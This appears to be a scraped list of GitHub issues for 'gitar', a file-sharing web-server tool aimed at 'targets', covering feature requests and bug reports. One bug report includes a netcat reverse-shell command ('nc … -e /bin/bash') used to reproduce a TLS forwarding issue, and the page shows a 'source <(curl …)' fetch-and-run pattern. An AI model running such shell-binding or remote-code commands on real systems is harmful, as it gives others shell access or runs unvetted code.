ariary / gitar Goto Github PK

source <(curl ….)

Add a flag —secret-header to use a secret header instead of secret path:

• if the header is not good have the same response every time

Add —dry-run Flag that won’t launch the server but just print the command line to load shortcut

Be able to easily share file from web server host to by using same shortcut

probably need web socket and upload a web socket client to the target

Provide ability to launch web server exchange juste by launching gitar

Likely, gitar has to retrieve eth0 or something like that

(it can’t be fully magic)

• pull file with '/' in its name (ie depth >0)
• pull a directory
• push a directory

All is in the title:
The traffic/connection is forwarded to the target service but isn't decrypted

So the target service can't decrypt it:

Step to reproduce

# 1st tab: launch gitar with port forwarding + tls
./generate.sh
./gitar -s "toto" -f 4444 --tls

# 2nd tab: netcat listener
nc -nvlp 4444

# 3rd tab: shutdown http server
curl -k https://127.1:9292/toto/shutdown
# and now connect to the netcat listener
nc 127.1 9292 -e /bin/bash

Notes: Without --tls it works perfectly

• Generate cert in entry point to avoid volume mount between host and container and make https default
• Non root user (take inspiration of tacos)

• cmd.exe: alias ~ doskey `command
• powershell completion: https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/register-argumentcompleter?view=powershell-7.2

• Create an handler for windows shortcut (always available)

• only change the line to copy when —windows Flag is enabled

• Powershell solution

• cmd.exe solution

• ftp
• Tcp
• tftp
• smb
• WebDAV (with curl https://stackoverflow.com/questions/1205101/command-line-utility-for-webdav-upload)
• ?

• pull a directory
• push a directory
• completion

• Only work on bash
• Does not reconstruct the hierarchy
• Recursivity is not optimal for zsh